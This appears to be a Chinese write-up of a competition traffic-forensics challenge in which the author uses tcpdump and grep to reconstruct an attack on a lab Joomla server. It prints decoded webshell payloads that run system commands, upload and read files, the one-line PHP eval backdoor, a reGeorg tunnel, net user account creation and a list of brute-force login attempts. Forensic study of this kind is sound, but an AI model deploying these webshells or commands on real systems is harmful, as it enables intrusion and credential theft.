[信息安全铁人三项赛总决赛](数据赛)第二题

字数 1157阅读 2644

WriteUps

信息安全铁人三项赛总决赛总结(企业赛)
信息安全铁人三项赛总决赛(数据赛)第二题
信息安全铁人三项赛总决赛(数据赛)第三题
信息安全铁人三项赛总决赛(数据赛)第四题


所有题目 : https://github.com/WangYihang/t3sec-network-flow-analysis/blob/master/2016-2017/%E5%86%B3%E8%B5%9B/N-EM-00002.md


首先根据队友的发现 , 找到了攻击者的 ip : 172.16.10.121
然后这条命令将所有的 http 数据包的请求以及相应全部提取出来
写了一个 Shell 脚本 , 提取完所有的包大概也就用了两分钟左右的时间

tcpdump -A -s 0 'host 172.16.10.121 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' -r 1_00005_20170908171421.pcap > 5
#!/bin/bash

target_file='http.txt'
target_folder='http'

mkdir ${target_folder}
touch ${target_folder}/${target_file}

for file in `ls *.pcap`;
do
    echo "Dumping http package in ${file}..."
    tcpdump -A -s 0 'host 172.16.10.121 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' -r $file > ${target_folder}/${file}.txt
    echo "${file} Done!"
done

for file in `ls ${target_folder}/*.txt`;
do
    cat $file >> ${target_folder}/${target_file}
done

但是如果使用 wireshark 会很费时间
不得不感叹命令行工具的强大

然后进入 http 文件夹
直接搜索各种web攻击方式常见的关键字即可
比如如下几道题目 :

  1. 询问攻击者进行内网端口扫描的IP范围
    第一题 , 想到攻击者进行内网渗透 , 可能会使用到 reGeorg 这个工具
    其中很重要的关键字就是 tunnel , tunnel.php , tunnel.nosocket.php
    尝试进行搜索
grep -r -n 'tunnel.php' http.txt

发现很多类似下面的结果 :

POST http://172.16.10.115/tunnel.php?cmd=connect&target=192.168.28.131&port=21

事实上如果大家对 reGeorg 熟悉的话 , 直接就可以搜索关键字 :

?cmd=connect&target=

因为 reGeorg 在建立一个新的 TCP 链接的时候会使用这样的接口

grep '\?cmd=connect\&target=[0-9]' http.txt | awk -F '\?cmd=connect\&target=' '{print $2}' | awk -F ' HTTP' '{print $1}' | sort | uniq | sed 's/\&port\=/ /g'
image.png
grep '\?cmd=connect\&target=[0-9]' http.txt | awk -F '\?cmd=connect\&target=' '{print $2}' | awk -F '&port' '{print $1}' | sort | uniq

这条命令就可以解决这个问题了 :

image.png

答案 : 192.168.28.120-192.168.28.135

  1. 攻击者第一次使用的 webshell 的链接密码
    既然是 webshell , 又是 php 的网站
    那就直接先搜索 eval / assert 之类的关键字
grep -n 'eval(' [0-9]*.txt
image.png

由于主办方提供的数据包已经是时间顺序
那么在外网渗透测试的时候使用的 webshell 链接密码必然是 : Jshell
内网渗透测试应该是 Bshell 或者 cmd_shell

  1. 攻击者在内网渗透过程中BlueCMS使用的 webshell 链接密码
    答案 : Bshell

  2. 内网 bluecms 的第一个网络适配器的ip
    网络适配器的 IP
    那么可能是执行了系统的 ipconfig 或者 ifconfig 命令
    可以直接 grep 一下这些命令的关键字

image.png
image.png

答案 : 192.168.20.117

是一台 Windows 服务器

  1. 攻击者在内网添加了一个用户 , 求用户名密码
    既然是 Windows 服务器 , 那么添加用户的命令当然是 net user [USERNAME] [PASSWORD] /add 了
image.png
image.png
cat -n http.txt | grep 71202 | sed 's/%2F/\//g' | sed 's/%2B/\+/g' | sed 's/%3D/=/g'
image.png
net user hacker hacker /add

做到这里 , 我认为还是不要着急做题 , 先分析攻击者攻击流程比较好
首先从一句话木马入手
首先看 JShell

image.png
grep 'Jshell=' http.txt | sed 's/%2F/\//g' | sed 's/%2B/\+/g' | sed 's/%3D/=/g'
with open("shell") as f:
    for line in f:
        import urllib
        print "-" * 32
        data = ("Jshell=@eval(ba" + urllib.unquote(line)[16:-1])
        print data
        data = data.split("&")
        for i in data[1:]:
            d = i.split("=")
            key = d[0]
            value = ("".join("%s=" % (i) for i in d[1:]))[0:-1]
            try:
                print "%s=%s" % (key, value.decode("base64"))
            except:
                print "%s=%s" % (key, (value + (4 - len(d[1]) % 4) * "=").decode("base64"))
image.png
image.png
['Jshell=@eval(base64_decode($_POST[z0]));', 'z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7aWYoJEQ9PSIiKSREPWRpcm5hbWUoJF9TRVJWRVJbIlBBVEhfVFJBTlNMQVRFRCJdKTskUj0ieyREfVx0IjtpZihzdWJzdHIoJEQsMCwxKSE9Ii8iKXtmb3JlYWNoKHJhbmdlKCJBIiwiWiIpIGFzICRMKWlmKGlzX2RpcigieyRMfToiKSkkUi49InskTH06Ijt9JFIuPSJcdCI7JHU9KGZ1bmN0aW9uX2V4aXN0cygncG9zaXhfZ2V0ZWdpZCcpKT9AcG9zaXhfZ2V0cHd1aWQoQHBvc2l4X2dldGV1aWQoKSk6Jyc7JHVzcj0oJHUpPyR1WyduYW1lJ106QGdldF9jdXJyZW50X3VzZXIoKTskUi49cGhwX3VuYW1lKCk7JFIuPSIoeyR1c3J9KSI7cHJpbnQgJFI7O2VjaG8oInw8LSIpO2RpZSgpOw==']
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);$R="{$D}\t";if(substr($D,0,1)!="/"){foreach(range("A","Z") as $L)if(is_dir("{$L}:"))$R.="{$L}:";}$R.="\t";$u=(function_exists('posix_getegid'))?@posix_getpwuid(@posix_geteuid()):'';$usr=($u)?$u['name']:@get_current_user();$R.=php_uname();$R.="({$usr})";print $R;;echo("|<-");die();
// 获取操作系统信息以及用户名

--------------------------------
['Jshell=@eval(base64_decode($_POST[z0]));', 'z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiIvIi4kTjskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiLkBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7', 'z1=QzpcXHBocHN0dWR5XFxXV1dcXGpvb21sYVxc']
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
z1=C:\\phpstudy\\WWW\\joomla\\
// 读取目录 C:\\phpstudy\\WWW\\joomla\\ 下的所有文件
y.P.l.l...Rb.P.......8 12:47:10 1212    0666
LICENSE.txt 2015-09-08 12:47:10 18092   0666
README.txt  2015-09-08 12:47:10 4213    0666
robots.txt  2015-09-08 12:47:10 842 0666
web.config.txt  2015-09-08 12:47:10 1690    0666

--------------------------------
['Jshell=@eval(base64_decode($_POST[z0]));', 'z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskZj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JGM9JF9QT1NUWyJ6MiJdOyRjPXN0cl9yZXBsYWNlKCJcciIsIiIsJGMpOyRjPXN0cl9yZXBsYWNlKCJcbiIsIiIsJGMpOyRidWY9IiI7Zm9yKCRpPTA7JGk8c3RybGVuKCRjKTskaSs9MikkYnVmLj11cmxkZWNvZGUoIiUiLnN1YnN0cigkYywkaSwyKSk7ZWNobyhAZndyaXRlKGZvcGVuKCRmLCJ3IiksJGJ1Zik/IjEiOiIwIik7O2VjaG8oInw8LSIpO2RpZSgpOw==', 'z1=QzpcXHBocHN0dWR5XFxXV1dcXGpvb21sYVxcdHVubmVsLnBocA==', 'z2=']
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$f=base64_decode($_POST["z1"]);$c=$_POST["z2"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode("%".substr($c,$i,2));echo(@fwrite(fopen($f,"w"),$buf)?"1":"0");;echo("|<-");die();
z1=C:\\phpstudy\\WWW\\joomla\\tunnel.php
z2=
// 上传文件到 C:\\phpstudy\\WWW\\joomla\\tunnel.php

--------------------------------
['Jshell=@eval(base64_decode($_POST[z0]));', 'z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiIvIi4kTjskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiLkBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7', 'z1=QzpcXHBocHN0dWR5XFxXV1dcXGpvb21sYVxc']
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
z1=C:\\phpstudy\\WWW\\joomla\\
// 读取目录 C:\\phpstudy\\WWW\\joomla\\ 下的所有文件

--------------------------------
['Jshell=@eval(base64_decode($_POST[z0]));', 'z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztlY2hvKCJ8PC0iKTtkaWUoKTs=', 'z1=Y21k', 'z2=Y2QgL2QgIkM6XHBocHN0dWR5XFdXV1xqb29tbGFcIiZuZXRzdGF0IC1hbiB8IGZpbmQgIkVTVEFCTElTSEVEIiZlY2hvIFtTXSZjZCZlY2hvIFtFXQ==']
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";@system($r." 2>&1",$ret);print ($ret!=0)?"
ret={$ret}
":"";;echo("|<-");die();
z1=cmd
z2=cd /d "C:\phpstudy\WWW\joomla\"&netstat -an | find "ESTABLISHED"&echo [S]&cd&echo [E]
// 执行系统命令 netstat -an | find "ESTABLISHED"
第二题 ›› strings *.pcap | grep ESTABLISHED                                    
->|  TCP    127.0.0.1:1629         127.0.0.1:3306         ESTABLISHED
  TCP    127.0.0.1:3306         127.0.0.1:1629         ESTABLISHED
  TCP    192.168.20.117:80      172.16.10.115:1628     ESTABLISHED
  TCP    192.168.20.117:80      172.16.10.121:62858    ESTABLISHED
  TCP    192.168.20.117:80      172.16.10.121:62859    ESTABLISHED
  TCP    192.168.20.117:1628    172.16.10.115:80       ESTABLISHED
  TCP    192.168.28.130:2318    192.168.28.131:21      ESTABLISHED
  TCP    192.168.28.130:2322    192.168.28.131:21      ESTABLISHED
  TCP    192.168.28.130:3473    192.168.28.131:21      ESTABLISHED

--------------------------------
['Jshell=@eval(base64_decode($_POST[z0]));', 'z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztlY2hvKCJ8PC0iKTtkaWUoKTs=', 'z1=Y21k', 'z2=Y2QgL2QgIkM6XHBocHN0dWR5XFdXV1xqb29tbGFcIiZ3aG9hbWkmZWNobyBbU10mY2QmZWNobyBbRV0=']
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";@system($r." 2>&1",$ret);print ($ret!=0)?"
ret={$ret}
":"";;echo("|<-");die();
z1=cmd
z2=cd /d "C:\phpstudy\WWW\joomla\"&whoami&echo [S]&cd&echo [E]
// 执行系统命令 whoami
admin-6ef5d71ed\administrator

--------------------------------
['Jshell=@eval(base64_decode($_POST[z0]));', 'z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztlY2hvKCJ8PC0iKTtkaWUoKTs=', 'z1=Y21k', 'z2=Y2QgL2QgIkM6XHBocHN0dWR5XFdXV1xqb29tbGFcIiZpcGNvbmZpZyZlY2hvIFtTXSZjZCZlY2hvIFtFXQ==']
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";@system($r." 2>&1",$ret);print ($ret!=0)?"
ret={$ret}
":"";;echo("|<-");die();
z1=cmd
z2=cd /d "C:\phpstudy\WWW\joomla\"&ipconfig&echo [S]&cd&echo [E]
// 执行系统命令 ipconfig
->|
Windows IP Configuration
Ethernet adapter ........ 2:
   Connection-specific DNS Suffix  . : 
   IP Address. . . . . . . . . . . . : 192.168.20.117
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.20.1
Ethernet adapter ........:
   Connection-specific DNS Suffix  . : 
   IP Address. . . . . . . . . . . . : 192.168.28.130
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 
[S]
C:\phpstudy\WWW\joomla
[E] 
|<-

--------------------------------
['Jshell=@eval(base64_decode($_POST[z0]));', 'z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztlY2hvKCJ8PC0iKTtkaWUoKTs=', 'z1=Y21k', 'z2=Y2QgL2QgIkM6XHBocHN0dWR5XFdXV1xqb29tbGFcIiZuZXQgdXNlciBoYWNrZXIgaGFja2VyIC9hZGRkJmVjaG8gW1NdJmNkJmVjaG8gW0Vd']
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";@system($r." 2>&1",$ret);print ($ret!=0)?"
ret={$ret}
":"";;echo("|<-");die();
z1=cmd
z2=cd /d "C:\phpstudy\WWW\joomla\"&net user hacker hacker /addd&echo [S]&cd&echo [E]
// 执行系统命令 net user hacker hacker /addd
// 语法错误执行失败
->|.... /ADDD ......
 
..............:
 
 
NET USER 
[username [password | *] [options]] [/DOMAIN]
         username {password | *} /ADD [options] [/DOMAIN]
         username [/DELETE] [/DOMAIN]
 
...... NET HELPMSG 3506 ..................
 
[S]

--------------------------------
['Jshell=@eval(base64_decode($_POST[z0]));', 'z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztlY2hvKCJ8PC0iKTtkaWUoKTs=', 'z1=Y21k', 'z2=Y2QgL2QgIkM6XHBocHN0dWR5XFdXV1xqb29tbGFcIiZuZXQgdXNlciBoYWNrZXIgaGFja2VyIC9hZGQmZWNobyBbU10mY2QmZWNobyBbRV0=']
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";@system($r." 2>&1",$ret);print ($ret!=0)?"
ret={$ret}
":"";;echo("|<-");die();
z1=cmd
z2=cd /d "C:\phpstudy\WWW\joomla\"&net user hacker hacker /add&echo [S]&cd&echo [E]
// 执行系统命令 net user hacker hacker /add
执行成功

--------------------------------
['Jshell=@eval(base64_decode($_POST[z0]));', 'z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JFA9QGZvcGVuKCRGLCJyIik7ZWNobyhAZnJlYWQoJFAsZmlsZXNpemUoJEYpKSk7QGZjbG9zZSgkUCk7O2VjaG8oInw8LSIpO2RpZSgpOw==', 'z1=QzpcXHBocHN0dWR5XFxXV1dcXGpvb21sYVxcY29uZmlndXJhdGlvbi5waHA=']
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);;echo("|<-");die();
z1=C:\\phpstudy\\WWW\\joomla\\configuration.php
// 读取 C:\\phpstudy\\WWW\\joomla\\configuration.php 文件内容
->|<?php
class JConfig {
    public $offline = '0';
    public $offline_message = '.....................<br /> ..................';
    public $display_offline_message = '1';
    public $offline_image = '';
    public $sitename = 'test';
    public $editor = 'tinymce';
    public $captcha = '0';
    public $list_limit = '20';
    public $access = '1';
    public $debug = '0';
    public $debug_lang = '0';
    public $dbtype = 'mysqli';
    public $host = 'localhost';
    public $user = 'root';
    public $password = 'mysqlpasswd';
    public $db = 'joomla';
    public $dbprefix = 'shf76_';
    public $live_site = '';
    public $secret = 'BjbqVIMNAt3nB7Dc';
    public $gzip = '0';
    public $error_reporting = 'default';
    public $helpurl = 'https://help.joomla.org/proxy/index.php?option=com_help&k
17:22:31.607905 IP 192.168.20.117.http > 172.16.10.121.63886: Flags [.], seq 4381:5841, ack 769, win 63471, length 1460: HTTP
E...|.@........u..
y.P.....T...8P.......eyref=Help{major}{minor}:{keyref}';
    public $ftp_host = '';
    public $ftp_port = '';
    public $ftp_user = '';
    public $ftp_pass = '';
    public $ftp_root = '';
    public $ftp_enable = '0';
    public $offset = 'UTC';
    public $mailonline = '1';
    public $mailer = 'mail';
    public $mailfrom = 'admin@123.com';
    public $fromname = 'test';
    public $sendmail = '/usr/sbin/sendmail';
    public $smtpauth = '0';
    public $smtpuser = '';
    public $smtppass = '';                                                                                                           
    public $smtphost = 'localhost';
    public $smtpsecure = 'none';
    public $smtpport = '25';
    public $caching = '0';
    public $cache_handler = 'file';
    public $cachetime = '15';
    public $MetaDesc = 'sssss';
    public $MetaKeys = '';
    public $MetaTitle = '1';
    public $MetaAuthor = '1';
    public $MetaVersion = '0';
    public $robots = '';
    public $sef = '1';
    public $sef_rewrite = '0';
    public $sef_suffix = '0';
    public $unicodeslugs = '0';
    public $feed_limit = '10';
    public $log_path = 'C:\\phpstudy\\WWW\\joomla/logs';
    public $tmp_path = 'C:\\phpstudy\\WWW\\joomla/tmp';
    public $lifetime = '15';
    public $session_handler = 'database';
    public $memcache_persist = '1';
    public $memcache_compress = '0';
    public $memcache_server_host = 'localhost';
    public $memcache_server_port = '11211';
    public $memcached_persist = '1';
    public $memcached_compress = '0';
    public $memcached_server_host = 'localhost';
    public $memcached_server_port = '11211';
    public $redis_persist = '1';
    public $redis_server_host = 'localhost';
    pub
17:22:31.622948 IP 192.168.20.117.http > 172.16.10.121.63886: Flags [FP.], seq 5841:6540, ack 769, win 63471, length 699: HTTP
E...|.@........u..
y.P.........8P...H^..lic $redis_server_port = '6379';
    public $redis_server_auth = '';
    public $redis_server_db = '0';
    public $proxy_enable = '0';
    public $proxy_host = '';
    public $proxy_port = '';
    public $proxy_user = '';
    public $proxy_pass = '';
    public $massmailoff = '0';
    public $MetaRights = '';
    public $sitename_pagetitles = '0';
    public $force_ssl = '0';
    public $session_memcache_server_host = 'localhost';
   public $session_memcache_server_port = '11211';
   public $session_memcached_server_host = 'localhost';
   public $session_memcached_server_port = '11211';
   public $frontediting = '1';
   public $feed_email = 'author';
   public $cookie_domain = '';
   public $cookie_path = '';
   public $asset_id = '1';
|<-


--------------------------------
['Jshell=@eval(base64_decode($_POST[z0]));', 'z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRj1nZXRfbWFnaWNfcXVvdGVzX2dwYygpP3N0cmlwc2xhc2hlcygkX1BPU1RbInoxIl0pOiRfUE9TVFsiejEiXTskZnA9QGZvcGVuKCRGLCJyIik7aWYoQGZnZXRjKCRmcCkpe0BmY2xvc2UoJGZwKTtAcmVhZGZpbGUoJEYpO31lbHNle2VjaG8oIkVSUk9SOi8vIENhbiBOb3QgUmVhZCIpO307ZWNobygifDwtIik7ZGllKCk7', 'z1=C:\\\\phpstudy\\\\WWW\\\\joomla\\\\configuration.php']
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$F=get_magic_quotes_gpc()?stripslashes($_POST["z1"]):$_POST["z1"];$fp=@fopen($F,"r");if(@fgetc($fp)){@fclose($fp);@readfile($F);}else{echo("ERROR:// Can Not Read");};echo("|<-");die();
z1=C:\\phpstudy\\WWW\\joomla\\configuration.php
// 读取 C:\\phpstudy\\WWW\\joomla\\configuration.php 文件内容

看一下这个 Jshell 是如何被写入服务器的

image.png

前三行应该就是利用漏洞将文件内容写入

image.png

可以看到 , 攻击者利用了文件

/administrator/index.php?option=com_templates&view=template&id=503&file=L2luZGV4LnBocA
编辑了 index.php ("L2luZGV4LnBocA".decode("base64") == "index.php") 文件
image.png

在 index 中插入一行

<?php eval($_POST['Jshell']);?>

继续向上回溯 , 攻击者如何登录 ?

http ›› grep -n -C 32 'POST /administrator/' [0-9]*.txt | grep 'username' | grep -o 'username.*'                                                                                             
username=ftpadmin&passwd=123456789&lang=&option=com_login&task=login&return=aW5kZXgucGhw&120b2c391a29a8d9518b5bf1f1ec7f29=1
username=ftpadmin&passwd=a123456&lang=&option=com_login&task=login&return=aW5kZXgucGhw&120b2c391a29a8d9518b5bf1f1ec7f29=1
username=ftpadmin&passwd=123456&lang=&option=com_login&task=login&return=aW5kZXgucGhw&120b2c391a29a8d9518b5bf1f1ec7f29=1
username=ftpadmin&passwd=a123456789&lang=&option=com_login&task=login&return=aW5kZXgucGhw&120b2c391a29a8d9518b5bf1f1ec7f29=1
username=ftpadmin&passwd=1234567890&lang=&option=com_login&task=login&return=aW5kZXgucGhw&120b2c391a29a8d9518b5bf1f1ec7f29=1
username=ftpadmin&passwd=woaini1314&lang=&option=com_login&task=login&return=aW5kZXgucGhw&120b2c391a29a8d9518b5bf1f1ec7f29=1
username=admin&passwd=123456789&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=admin&passwd=a123456&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=admin&passwd=123456&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=admin&passwd=a123456789&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=admin&passwd=1234567890&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=admin&passwd=woaini1314&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=ftpadmin&passwd=123456789&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
